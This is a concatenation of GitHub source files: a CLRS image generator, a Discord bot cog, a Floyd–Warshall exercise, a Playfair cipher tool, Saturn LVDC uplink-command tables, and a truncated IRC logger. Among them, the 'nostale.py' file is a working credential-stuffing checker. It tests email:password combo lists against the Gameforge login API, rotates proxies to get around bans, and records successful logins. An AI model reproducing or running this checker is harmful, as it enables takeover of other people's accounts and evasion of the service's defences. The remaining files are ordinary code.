img.save(location)\n\ndef CreateImage(chapter, section, problem_id):\n    title = ''\n    problem_title = ''\n    image_folder = ''\n    image_filename = ''\n\n    if isinstance(chapter, int):\n        image_folder = f\"assets/img/{chapter:02d}/\"\n    else:\n        image_folder = f\"assets/img/{chapter}/\"\n\n    if section > 0:\n        problem_title = f\"Exercise {chapter}.{section}-{problem_id}\"\n        image_filename = f\"{chapter}.{section}-{problem_id}.jpg\"\n        if isinstance(chapter, int):\n            title = toc_data['chapters'][chapter - 1]['sections'][int(section) - 1]['name']\n        else:\n            title = toc_data['appendices'][ord(chapter) - ord('A')]['sections'][int(section) - 1]['name']\n    else:\n        problem_title = f\"Problem {chapter}-{problem_id}\"\n        image_filename = f\"{chapter}-{problem_id}.jpg\"\n        if isinstance(chapter, int):\n            title = toc_data['chapters'][chapter - 1]['problems'][problem_id - 1]['name']\n        else:\n            title = toc_data['appendices'][ord(chapter) - ord('A')]['problems'][problem_id - 1]['name']\n    \n    title_parts = title.split(' ')\n    title = ''\n    num_chars = 0\n    for part in title_parts:\n        title += part + ' '\n        num_chars += len(part)\n        if (num_chars > 12):\n            num_chars = 0\n            title += '\\n'\n\n    # Create 
Image\n img = Image.new('RGB', (W, H), color = (255, 255, 255))\n d = ImageDraw.Draw(img)\n\n # Write texts\n d.rectangle([W/2 - 260, 50, W/2 + 260, 120], fill = (71, 41, 163))\n d.text((W/2, 100), \"CLRS SOLUTIONS\", font=arial_black_40, fill = (255, 255, 255), anchor=\"ms\")\n d.text((W/2, 180), problem_title, font=arial_black_52, fill = (45, 25, 120), anchor=\"ms\")\n d.rectangle([W/2 - 260, 120, W/2 + 260, 200], outline = (71, 41, 163), width=4)\n d.text((W/2, 360), title, font=times_120, fill = (0, 0, 0), align=\"center\", anchor=\"ms\", spacing=20)\n\n # Save image\n img.save(image_folder + image_filename)\n\n# chapter = 1\n# prob_list = [\n# [i for i in range(1, 2)],\n# [i for i in range(1, 6)],\n# [i for i in range(1, 4)]\n# ]\n\n# chapter = 2\n# prob_list = [\n# [i for i in range(1, 5)],\n# [i for i in range(1, 5)],\n# [i for i in range(1, 5)],\n# [i for i in range(1, 7)]\n# ]\n\n# chapter = 3\n# prob_list = [\n# [i for i in range(1, 7)],\n# [i for i in range(1, 9)],\n# [i for i in range(1, 9)]\n# ]\n\n# chapter = 4\n# prob_list = [\n# [i for i in range(1, 1)],\n# [i for i in range(1, 6)],\n# [i for i in range(1, 8)],\n# [i for i in range(1, 10)],\n# [i for i in range(1, 8)],\n# [i for i in range(1, 5)]\n# ]\n\n# for section, lst in enumerate(prob_list):\n# if section == 0:\n# continue\n# for prob in lst:\n# CreateImage(chapter, section, prob)\n\nfor i in range(1, 8):\n CreateImageDirect(\"Recursion-tree Method\\nfor Solving Recurrences\", f\"Exercise 4.4-{i}\", f\"assets/img/04/4.4-{i}.jpg\")","repo_name":"Atekihcan/CLRS","sub_path":"utils/GenerateImage.py","file_name":"GenerateImage.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"25093836155","text":"import discord\nfrom discord.ext import commands\n\nrules = [\n \"Do not post or talk about NSFW content in text or voice chat. This server is a safe for work, that is except in\",\n \"Be respectful of all members, especially Staff.\",\n \"Avoid topics such as: Politics,Religion,Self-Harm or anything considered controversial anywhere on the server except on the **Debate Club**\",\n \"Do not advertise your server or other communities without express consent from an Owner of this server.\",\n \"Do not share others' personal information without their consent.\",\n \"Do not flood or spam the text chat. Do not tag native roles repeatedly without a reason.\",\n \"No ear rape or mic spam. If you have a loud background, go on push-to-talk or mute.\",\n \"Try to settle disputes personally. You may mute or block a user. 
If you cannot resolve the issue, contact staff in <#685832739517366340>\",\n    \"Do not impersonate users or members of the staff \",\n    \"No asking to be granted roles/moderator roles, you may apply in <#671788773733826628> but begging the staff repeatedly and irritatingly will result in warnings or even ban.\"]\n\n\nclass Show(commands.Cog):\n    '''\n    Commands involving showing some information related to the server.\n    '''\n\n    def __init__(self, client):\n        self.client = client\n\n    @commands.Cog.listener()\n    async def on_ready(self):\n        print('Show cog is ready!')\n\n    # Shows how many members there are in the server\n    @commands.command()\n    async def members(self, ctx):\n        '''\n        Shows how many members there are in the server (including bots).\n        '''\n        await ctx.message.delete()\n        all_users = ctx.guild.members\n        await ctx.send(f'{len(all_users)} members!')\n\n    # Shows the specific rule\n    @commands.command()\n    async def rule(self, ctx, numb: int = None):\n        '''\n        Shows a specific server rule.\n        :param numb: The number of the rule to show.\n        '''\n        await ctx.message.delete()\n        if not numb:\n            return await ctx.send('**Invalid parameter!**')\n        if numb > 10 or numb <= 0:\n            return await ctx.send('**Parameter out of range!**')\n\n        embed = discord.Embed(title=f'Rule - {numb}#', description=f\"{rules[numb - 1]}\",\n                              colour=discord.Colour.dark_green())\n        embed.set_footer(text=ctx.author.guild.name)\n        await ctx.send(embed=embed)\n\n\ndef setup(client):\n    client.add_cog(Show(client))\n","repo_name":"xxxAnn/sloth-bot","sub_path":"cogs/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3272572223","text":"#Nostale checker (PROXY VERSION) - V4\r\nimport sys\r\nimport os\r\nimport requests as r\r\nfrom playsound import playsound\r\n\r\ndef cls():\r\n    os.system('cls')\r\n\r\ncls()\r\napi = \"https://spark.gameforge.com/api/v1/auth/thin/sessions\"\r\naccount_number = 0\r\nproxy_number = 0\r\ncombo_position = 0\r\nproxy_position = 0\r\nhit = 0\r\nbanner = \"\"\"\r\n ▐ ▄       .▄▄ · ▄▄▄▄▄ ▄▄▄· ▄▄▌  ▄▄▄ . ▄▄· ▄ .▄▄▄▄ . ▄▄· ▄ •▄ ▄▄▄ .▄▄▄\r\n•█▌▐█▪     ▐█ ▀. •██  ▐█ ▀█ ██•  ▀▄.▀·▐█ ▌▪██▪▐█▀▄.▀·▐█ ▌▪█▌▄▌▪▀▄.▀·▀▄ █·\r\n▐█▐▐▌ ▄█▀▄ ▄▀▀▀█▄ ▐█.▪▄█▀▀█ ██▪  ▐▀▀▪▄██ ▄▄██▀▐█▐▀▀▪▄██ ▄▄▐▀▀▄·▐▀▀▪▄▐▀▀▄\r\n██▐█▌▐█▌.▐▌▐█▄▪▐█ ▐█▌·▐█ ▪▐▌▐█▌▐▌▐█▄▄▌▐███▌██▌▐▀▐█▄▄▌▐███▌▐█.█▌▐█▄▄▌▐█•█▌\r\n▀▀ █▪ ▀█▄▀▪ ▀▀▀▀  ▀▀▀  ▀  ▀ .▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀ · ▀▀▀ ·▀▀▀ ·▀  ▀ ▀▀▀ .▀  ▀\r\n                          By Kynda - V4\r\n\r\n    Nouvelles fonctions :\r\n    [+] Changement de proxy automatique et infinies\r\n    [+] Pas de sauts de comptes\r\n    \r\n    Merci à ArSenal pour l'api et les keywords\r\n\"\"\"\r\n\r\ntry:\r\n    file = open('combo.txt',\"r\")\r\n    combo = file.readlines()\r\n    file.close()\r\nexcept IOError:\r\n    create = open(\"combo.txt\",\"a\")\r\n    create.close()\r\n    sys.exit(\"[!] On dirait bien que tu n'as pas fait de combos.\")\r\ntry:\r\n    file = open(\"proxies.txt\",\"r\")\r\n    proxies = file.readlines()\r\n    file.close()\r\nexcept IOError:\r\n    create = open(\"proxies.txt\",\"a\")\r\n    create.close()\r\n    sys.exit(\"[!] 
On dirait bien que tu as oublié tes proxies.\")\r\nprint(banner)\r\nfor acc in combo:\r\n    account_number+=1\r\nfor proxy in proxies:\r\n    proxy_number+=1\r\nif account_number == 0:\r\n    sys.exit(\"Le fichier combo est vide.\")\r\nif proxy_number == 0:\r\n    sys.exit(\"Le fichier proxies est vide.\")\r\ntotal_account = str(account_number)\r\nprint(\"[i] Nombre de comptes: \"+total_account+'\\n[i] Nombre de proxies: '+str(proxy_number))\r\naccount_number-=1\r\nwhile combo_position <= account_number:\r\n    credentials = combo[combo_position]\r\n    credentials = credentials.strip()\r\n    account = credentials.split(\":\")\r\n    email = account[0]\r\n    password = account[1]\r\n    try:\r\n        actual_proxy = proxies[proxy_position].strip()\r\n    except IndexError:\r\n        print(\"La liste de proxy est épuisé.\")\r\n        print(\"[i] Dernier compte check : \"+credentials)\r\n        proxy_position = 0\r\n        actual_proxy = proxies[proxy_position].strip()\r\n        print(\"Le checker recommence avec le premier proxy.\")\r\n    actual_proxy = actual_proxy.split(\":\")\r\n    ip = actual_proxy[0]\r\n    port = actual_proxy[1]\r\n    request_proxy = {\r\n        \"https\":\"https://\"+ip+\":\"+port\r\n    }\r\n    data = {\"identity\":email,\"password\":password,\"locale\":\"fr_FR\",\"gfLang\":\"fr\",\"platformGameId\":\"dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9\"}\r\n    try:\r\n        rep = r.post(api,data=data,proxies=request_proxy)\r\n        if \"token\" in rep.text:\r\n            playsound('hit.mp3')\r\n            hit+=1\r\n            print(\"[\"+str(hit)+\"] Nostale [->] \" + credentials +\"\\n\")\r\n            save = open(\"output.txt\",\"a\")\r\n            save.write(\"[\"+str(hit)+\"] Nostale [->]\" + credentials+\"\\n\")\r\n            save.close()\r\n            combo_position+=1\r\n        elif \"Unauthorized\" in rep.text:\r\n            combo_position+=1\r\n            proxy_position+=1\r\n            print(\"[\"+str(combo_position) +\"/\"+total_account+\"] \"+credentials)\r\n        elif \"Forbidden\" in rep.text:\r\n            playsound('ban.mp3')\r\n            print(\"[!] 
Le proxy est banni\")\r\n            proxy_position+=1\r\n        else:\r\n            print(\"Une erreur inconnue s'est produite : \\n\"+rep.text)\r\n    except:\r\n        print(\"[i] Impossible de se connecter au proxy.\\nNouvelle connexion proxy établie.\")\r\n        proxy_position+=1\r\n\r\nsys.exit(\"[+] Le travail est terminé.\")\r\n#Dude, I don't know what else to add, but 105 lines is way classier","repo_name":"Shadawks/Nostale-checker","sub_path":"nostale.py","file_name":"nostale.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73871049810","text":"import sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\n\ngraph = [[INF]*(n+1) for _ in range(n+1)]\nfor i in range(1, n+1):\n    graph[i][i] = 0\n\nfor i in range(m):\n    a, b = map(int, input().split())\n    graph[a][b], graph[b][a] = 1, 1\n\nfor k in range(1, n+1):\n    for a in range(1, n+1):\n        for b in range(1, n+1):\n            graph[a][b] = min(graph[a][b], graph[a][k]+graph[k][b])\n\nresult_val = INF\nfor i in range(1, n+1):\n    if sum(graph[i][1:]) < result_val:\n        result = i\n        result_val = sum(graph[i][1:])\n\nprint(result)\n","repo_name":"gimquokka/problem-solving","sub_path":"BOJ/boj_1389_6단계.py","file_name":"boj_1389_6단계.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"23425393172","text":"import sys\nfrom ciphertext import CipherText\nfrom playfairgrid import PlayfairGrid\n\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint('Please include some arguments.')\n\t\treturn\n\n\tmode = 'encrypt'\n\ttext = ''\n\tkey = None\n\n\tif '-f' in sys.argv:\n\t\tif len(sys.argv) <= sys.argv.index('-f') + 1:\n\t\t\tprint('Need an accompanying file name')\n\t\t\treturn\n\n\t\ttextFile = open(sys.argv[sys.argv.index('-f')+1])\n\t\ttext = textFile.read()\n\t\ttextFile.close()\n\n\tif '-t' in sys.argv:\n\t\tif len(sys.argv) <= sys.argv.index('-t') + 1:\n\t\t\tprint('Need cipher text')\n\t\t\treturn\n\n\t\ttext = sys.argv[sys.argv.index('-t')+1]\n\n\tif '-d' in sys.argv:\n\t\tmode = 'decrypt'\n\n\tif '-k' in sys.argv:\n\t\tif len(sys.argv) < sys.argv.index('-k') + 1:\n\t\t\tprint('add key after key flag')\n\t\t\treturn\n\t\tkey = sys.argv[sys.argv.index('-k')+1].upper()\n\n\tif mode == 'decrypt':\n\t\tprint(playfairDecrypt(CipherText(text), key))\n\n\tif mode == 'encrypt':\n\t\tprint(playfairEncrypt(text, key))\n\ndef playfairEncrypt(message, keyword):\n\tres = ''\n\tgrid = PlayfairGrid(keyword)\n\tfor digraph in CipherText(message).generatePlayfairDigraphs():\n\t\tres += grid.encodeDigraph(digraph)\n\treturn res\n\ndef playfairDecrypt(cipher, keyword):\n\tres = ''\n\tgrid = PlayfairGrid(keyword)\n\tfor digraph in CipherText(cipher).generatePlayfairDigraphs():\n\t\tres += grid.decodeDigraph(digraph)\n\n\treturn res.lower()\n\n\n\nif __name__ == \"__main__\":\n\tmain()\t\t","repo_name":"dylansturg/WebProjects","sub_path":"Crypto/playfair/playfaircipher.py","file_name":"playfaircipher.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22444291132","text":"scaleTBD = -1000\n\ndcsTypes = {\n    \"ANTENNA TO HIGH GAIN\": {\n        \"name\": \"ANTENNA TO HIGH GAIN\",\n        \"description\": \"Switch to PCM and CCS high-gain antennas\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"ANTENNA TO LOW GAIN\": {\n        \"name\": \"ANTENNA TO LOW GAIN\",\n        \"description\": \"Switch to PCM 
and CCS low-gain antennas\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"ANTENNA TO OMNI\": {\n        \"name\": \"ANTENNA TO OMNI\",\n        \"description\": \"Switch to PCM and CCS omni antennas\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"COARSE TIME BASE UPDATE\": {\n        \"name\": \"COARSE TIME BASE UPDATE\",\n        \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n        \"dataValues\": [\"DELTA T\"],\n        \"dataUnits\": [\"SECONDS\"],\n        \"dataDescriptions\": [\n            \"Delta-time in current time base, in range -3968 to +3968, rounded to nearest 128-second multiple\"\n        ],\n        \"numDataWords\": 1,\n    },\n    \"EXECUTE ALTERNATE SEQUENCE\": {\n        # AS-513 D.S800 \n        # MS 26 bits = requested time for alternate sequence\n        # LS 4 bits = indicator bits\n        \"name\": \"EXECUTE ALTERNATE SEQUENCE\",\n        \"description\": \"Initiate alternate sequence\",\n        \"dataValues\": [\"TIME\", \"SEQUENCE\"],\n        \"dataScales\": [15, -1000],\n        \"dataUnits\": [\"SECONDS\", \"\"],\n        \"dataDescriptions\": [\n            \"Requested time (seconds) at which to activate the alternate sequence\",\n            \"Specifies the requested alternate sequence (0-15); for AS-513, 1 = sequence 4A and 2 = sequence 4B\"\n        ],\n        \"numDataWords\": 5\n    },\n    \"EXECUTE GENERALIZED MANEUVER\": {\n        \"name\": \"EXECUTE GENERALIZED MANEUVER\",\n        \"description\": \"Execute a maneuver that wasn't preprogrammed\",\n        \"dataValues\": [\"TIME\", \"TYPE\", \"PITCH\", \"YAW\", \"ROLL\"],\n        \"dataScales\": [15, -1000, 0, 0, 0],\n        \"dataUnits\": [\"SECONDS\", \"\", \"PIRADS\", \"PIRADS\", \"PIRADS\"],\n        \"dataDescriptions\": [\n            \"Time (seconds) at which to perform the maneuver\",\n            \"Type of maneuver: literal HOLD (hold inertial attitude) or TRACK (track local reference)\",\n            \"Desired pitch in PIRADs\",\n            \"Desired yaw in PIRADs\",\n            \"Desired roll in PIRADs\"\n        ],\n        \"numDataWords\": 20\n    },\n    \"EXECUTE MANEUVER A\": {\n        \"name\": \"EXECUTE MANEUVER A\",\n        \"description\": \"Initiates a maneuver to local horizontal in a retrograde position\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"EXECUTE MANEUVER B\": {\n        \"name\": \"EXECUTE MANEUVER B\",\n        \"description\": \"TBD\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"FINE TIME BASE UPDATE\": { # Same as TIME BASE UPDATE\n        \"name\": \"FINE TIME BASE UPDATE\",\n        \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n        \"dataValues\": [\"DELTA T\"],\n        \"dataUnits\": [\"SECONDS\"],\n        \"dataDescriptions\": [\n            \"Delta-time in current time base, in range -124 to +124, rounded to nearest 4-second multiple\"\n        ],\n        \"numDataWords\": 1,\n    },\n    \"GENERALIZED SWITCH SELECTOR\": {\n        \"name\": \"GENERALIZED SWITCH SELECTOR\",\n        \"description\": \"Issue a switch-selector function at the first opportunity\",\n        \"dataValues\": [\"STAGE\", \"ADDRESS\"],\n        \"dataDescriptions\": [\n            \"Literally, the string 'IU' or 'SIVB' without quotation marks\",\n            \"Octal address 000-177\"\n        ],\n        \"numDataWords\": 2\n    },\n    \"INHIBIT MANEUVER\": {\n        \"name\": \"INHIBIT MANEUVER\",\n        \"description\": \"Inhibit coast phase attitude maneuver\",\n        \"dataValues\": [], \n        \"numDataWords\": 0\n    },\n    \"INHIBIT WATER VALVE LOGIC\": {\n        \"name\": \"INHIBIT WATER VALVE LOGIC\",\n        \"description\": \"Inhibit water valve from changing position\",\n        \"dataValues\": [],\n        \"numDataWords\": 0\n    },\n    \"LADDER MAGNITUDE LIMIT\": {\n        \"name\": \"LADDER MAGNITUDE LIMIT\",\n        \"description\": \"Sets magnitude limit on pitch/roll/yaw D/A \\\"ladders\\\"\",\n        \"dataValues\": [\"ANGLE\"],\n        \"dataUnits\": 
[\"DEGREES\"],\n \"dataDescriptions\": [\"Decimal degrees, 0 through 15.3\"],\n \"numDataWords\": 1\n },\n \"MEMORY DUMP\": {\n \"name\": \"MEMORY DUMP\",\n \"description\": \"The contents of the specified contiguous memory block are telemetered.\",\n \"dataValues\": [\"DM0\", \"DS0\", \"LOC0\", \"DM1\", \"DS1\", \"LOC1\"],\n \"dataDescriptions\": [\n \"Starting module number, one of 0, 2, 4, or 6\",\n \"Starting sector number, octal 00-17\",\n \"Starting offset within sector, octal 000-377\",\n \"Ending module number, one of 0, 2, 4, or 6\",\n \"Ending sector number, octal 00-17\",\n \"Ending offset within sector, octal 000-377\"\n ],\n \"numDataWords\": 6\n },\n \"NAVIGATION UPDATE\": {\n \"name\": \"NAVIGATION UPDATE\",\n \"simple\": True,\n \"description\": \"Re-initialize the navigation state vector at a specified time\",\n \"dataValues\": [\"ZDOT\", \"XDOT\", \"YDOT\", \"Z\", \"X\", \"Y\", \"T\"],\n \"dataScales\": [14, 14, 14, 23, 23, 23, 15],\n \"dataUnits\": [\"METERS/SECOND\", \"METERS/SECOND\", \"METERS/SECOND\", \"METERS\", \"METERS\", \"METERS\", \"SECONDS\"],\n \"dataDescriptions\": [\n \"Inertial velocity along Z axis in fixed-space coordinate system\",\n \"Inertial velocity along X axis in fixed-space coordinate system\",\n \"Inertial velocity along Y axis in fixed-space coordinate system\",\n \"Position along Z axis in fixed-space coordinate system\",\n \"Position along X axis in fixed-space coordinate system\",\n \"Position along Y axis in fixed-space coordinate system\",\n \"Time at which the adjustment takes effect\"\n ],\n \"numDataWords\": 35\n },\n \"RETURN TO NOMINAL TIMELINE\": {\n \"name\": \"RETURN TO NOMINAL TIMELINE\",\n \"simple\": True,\n \"description\": \"Returns to the pre-programmed orbital attitude timeline in effect prior to DCS-initiated action having overridden it.\",\n \"dataValues\": [\"TRNTL\"],\n \"dataScales\": [15],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\"Replacement time, in seconds\"],\n \"numDataWords\": 5\n },\n \"S-IVB/IU LUNAR IMPACT\": {\n \"name\": \"S-IVB/IU LUNAR IMPACT\",\n \"description\": \"Initiate maneuver to crash the S-IVB stage onto the moon\",\n \"dataValues\": [\"1ST & 2ND\", \"3RD & 4TH\", \"DELTA PITCH\", \"DELTA YAW\", \"DELTA ROLL\"],\n \"dataUnits\": [\"MINUTES\", \"SECONDS\", \"DEGREES\", \"DEGREES\", \"DEGREES\"],\n \"dataDescriptions\": [\n \"Time (minutes, 0-511) to issue 1st and 2nd lunar-impact switch-selector sequence\",\n \"Delay (seconds, 0-4095) before issuing 3rd and 4th lunar-impact switch-selector sequence\",\n \"Change in pitch, -31 to 31 integer degrees\",\n \"Change in yaw, -31 to 31 integer degrees\",\n \"Change in roll, -31 to 31 integer degrees\"\n ],\n \"numDataWords\": 7\n },\n \"SECTOR DUMP\": {\n \"name\": \"SECTOR DUMP\",\n \"description\": \"The contents of the specified memory sector(s) are telemetered\",\n \"dataValues\": [\"DM\", \"DS0\", \"DS1\"],\n \"dataDescriptions\": [\"Module number 0, 2, 4, or 6.\", \n \"Starting sector number 00-17 in octal.\",\n \"Ending sector number 00-17 in octal.\"],\n \"numDataWords\": 2\n },\n \"TARGET UPDATE\": { \n # AS-513 D.S670 (V.INCU, V.THNU, V.ECCU, V.NC3U, V.APDU, V.FU, D.VTRP)\n \"name\": \"TARGET UPDATE\",\n \"simple\": True,\n \"description\": \"Replace targeting quantities for second S-IVB burn\",\n \"dataValues\": [\"INCLIN.\", \"DEC. NODE\", \"ECC.\", \n \"TWICE ORB. VEL.\", \n \"PER. 
TO DEC.\", \"TRUE ANOM.\", \"TIME LEFT\"],\n \"dataScales\": [0, 0, 0, 26, 0, 0, 15],\n \"dataUnits\": [\"PIRADS\", \"PIRADS\", \"\", \"METER**2/SECONDS**2\", \"PIRADS\", \"PIRADS\", \"SECONDS\"],\n \"dataDescriptions\": [\n \"Inclination angle in PIRADs\",\n \"Descending node in PIRADs\",\n \"Eccentricity\",\n \"Twice orbital energy\",\n \"Angle from perigee to descending node in PIRADs\",\n \"True anomaly in PIRADs\",\n \"Time remaining in time base prior to burn, in seconds\"\n ],\n \"numDataWords\": 35\n },\n \"TD & E ENABLE\": {\n \"name\": \"TD & E ENABLE\",\n \"description\": \"Inhibits TLI so that Transposition, Docking, and Ejection can be accomplished in Earth orbit.\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TELEMETER SINGLE LOCATION\": {\n \"name\": \"TELEMETER SINGLE LOCATION\",\n \"description\": \"The content of a single selected memory location is telemetered\",\n \"dataValues\": [\"DM\", \"DS\", \"LOC\"],\n \"dataDescriptions\": [\"Module number 0, 2, 4, or 6.\", \n \"Sector number 00-17 in octal.\",\n \"Address within sector, 000-377 in octal.\"],\n \"numDataWords\": 3\n },\n \"TERMINATE\": {\n \"name\": \"TERMINATE\",\n \"description\": \"Stop DCS processing and reset for a new command\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE 6D\": {\n \"name\": \"TIME BASE 6D\",\n \"description\": \"Initiates time base 6D, S-IVB ignition restart\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE 8 ENABLE\": {\n \"name\": \"TIME BASE 8 ENABLE\",\n \"description\": \"Initiates time base 8, the post-S-IVB-separation maneuver\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE UPDATE\": {\n \"name\": \"TIME BASE UPDATE\",\n \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n \"dataValues\": [\"DELTA T\"],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\n \"Delta-time in current time base, in range -124 to +124, rounded to nearest 4-second multiple\"\n ],\n \"numDataWords\": 1,\n },\n \"UPDATE MANEUVER\": {\n \"name\": \"UPDATE MANEUVER\",\n \"description\": \"Change the time for starting the coast phase maneuver.\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n }\n\ndcsForAS512 = {\n 0o05: dcsTypes[\"INHIBIT MANEUVER\"],\n 0o10: dcsTypes[\"TIME BASE UPDATE\"],\n 0o11: dcsTypes[\"NAVIGATION UPDATE\"],\n 0o12: dcsTypes[\"GENERALIZED SWITCH SELECTOR\"],\n 0o13: dcsTypes[\"SECTOR DUMP\"],\n 0o14: dcsTypes[\"TELEMETER SINGLE LOCATION\"],\n 0o17: dcsTypes[\"TIME BASE 8 ENABLE\"],\n 0o20: dcsTypes[\"TERMINATE\"],\n 0o22: dcsTypes[\"UPDATE MANEUVER\"],\n 0o25: dcsTypes[\"TIME BASE 6D\"],\n 0o31: dcsTypes[\"TARGET UPDATE\"],\n 0o33: dcsTypes[\"EXECUTE MANEUVER A\"],\n 0o34: dcsTypes[\"EXECUTE MANEUVER B\"],\n #0o40: dcsTypes[\"INHIBIT MANEUVER\"],\n 0o41: dcsTypes[\"LADDER MAGNITUDE LIMIT\"],\n #0o43: dcsTypes[\"UPDATE MANEUVER\"],\n 0o45: dcsTypes[\"INHIBIT WATER VALVE LOGIC\"],\n 0o52: dcsTypes[\"S-IVB/IU LUNAR IMPACT\"],\n 0o53: dcsTypes[\"ANTENNA TO OMNI\"],\n 0o54: dcsTypes[\"ANTENNA TO LOW GAIN\"],\n 0o55: dcsTypes[\"ANTENNA TO HIGH GAIN\"],\n 0o60: dcsTypes[\"TD & E ENABLE\"]\n}\n\ndcsForAS513 = {\n 0o10: dcsTypes[\"FINE TIME BASE UPDATE\"],\n 0o11: dcsTypes[\"NAVIGATION UPDATE\"],\n 0o12: dcsTypes[\"GENERALIZED SWITCH SELECTOR\"],\n 0o13: dcsTypes[\"MEMORY DUMP\"],\n 0o20: dcsTypes[\"TERMINATE\"],\n 0o21: dcsTypes[\"EXECUTE ALTERNATE SEQUENCE\"],\n 0o35: dcsTypes[\"EXECUTE GENERALIZED MANEUVER\"],\n 0o36: dcsTypes[\"RETURN TO NOMINAL TIMELINE\"],\n 0o40: dcsTypes[\"COARSE 
TIME BASE UPDATE\"],\n 0o41: dcsTypes[\"LADDER MAGNITUDE LIMIT\"],\n 0o45: dcsTypes[\"INHIBIT WATER VALVE LOGIC\"]\n}\n","repo_name":"virtualagc/virtualagc","sub_path":"yaLVDC/dcsDefinitions.py","file_name":"dcsDefinitions.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"66"} +{"seq_id":"23386033087","text":"#!/usr/bin/env python3\n\n\n\"\"\"Channel Logger.\"\"\"\n\n\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport select\nimport socket\nimport ssl\nimport time\n\n_NAME = 'clog'\n_log = logging.getLogger(_NAME)\n\n\nclass _ctx:\n retry_delay = 1\n last_upkeep_time = 0\n\n\ndef main():\n \"\"\"Run client.\"\"\"\n log_fmt = ('%(asctime)s %(levelname)s %(filename)s:%(lineno)d '\n '%(funcName)s() %(message)s')\n logging.basicConfig(format=log_fmt, level=logging.INFO)\n\n # Read configuration.\n with open(f'{_NAME}.json', encoding='utf-8') as stream:\n config = json.load(stream)\n\n file_prefix = os.path.join(config['directory'], _NAME)\n _log.info('File prefix is %s', file_prefix)\n _fwrite(file_prefix, 'Started')\n\n while True:\n try:\n _run(config['host'], config['port'], config['tls'],\n config['nick'], config['password'], config['channels'],\n file_prefix, config['max_files'])\n except Exception:\n _log.exception('Client encountered error')\n _log.info('Reconnecting in %d s', _ctx.retry_delay)\n time.sleep(_ctx.retry_delay)\n _ctx.retry_delay = min(_ctx.retry_delay * 2, 3600)\n\n\ndef _run(host, port, tls, nick, password, channels, file_prefix, max_files):\n _log.info('Connecting ...')\n sock = socket.create_connection((host, port))\n if tls:\n tls_context = ssl.create_default_context()\n sock = tls_context.wrap_socket(sock, server_hostname=host)\n\n _log.info('Authenticating ...')\n _send(sock, f'PASS {password}')\n _send(sock, f'NICK {nick}')\n _send(sock, f'USER {nick} {nick} {host} :{nick}')\n\n _log.info('Joining channels ...')\n for channel in channels:\n _send(sock, f'JOIN {channel}')\n\n _log.info('Receiving messages ...')\n for line in _recv(sock):\n if line is not None:\n prefix, sender, command, middle, trailing = _parse_line(line)\n if command == 'PING':\n _send(sock, f'PONG :{trailing}')\n elif command in ['JOIN', 'PART', 'QUIT']:\n text = f'{sender} [{prefix}] {command} {middle}'\n if trailing is not None:\n text = f'{text} :{trailing}'\n _fwrite(file_prefix, text)\n elif command in ['PRIVMSG']:\n _log.info(\n '>> sender: %s; command: %s; middle: %s; trailing: %s',\n sender, command, middle, trailing)\n text = f'{sender} {command} {middle} :{trailing}'\n _fwrite(file_prefix, text)\n _ctx.retry_delay = 1\n if time.time() - _ctx.last_upkeep_time >= 3600:\n _upkeep(file_prefix, max_files)\n _ctx.last_upkeep_time = int(time.time())\n\n\ndef _fwrite(file_prefix, text):\n \"\"\"Write content to file and close the file.\"\"\"\n current_time = datetime.datetime.now(datetime.timezone.utc)\n fdate = current_time.strftime('%Y-%m-%d')\n ftime = current_time.strftime('%H:%M:%S')\n filename = f'{file_prefix}-{fdate}.txt'\n basedir = os.path.dirname(filename)\n if not os.path.isdir(basedir):\n os.makedirs(basedir)\n with open(filename, 'a', encoding='utf-8') as stream:\n stream.write(f'{fdate} {ftime} {text}\\n')\n\n\ndef _upkeep(file_prefix, max_files):\n filenames = sorted(glob.glob(file_prefix + '*'))\n total_files = len(filenames)\n surplus_files = total_files - max_files\n _log.info('Upkeep: max_files: %d; total_files: %d; surplus_files: %d',\n max_files, 
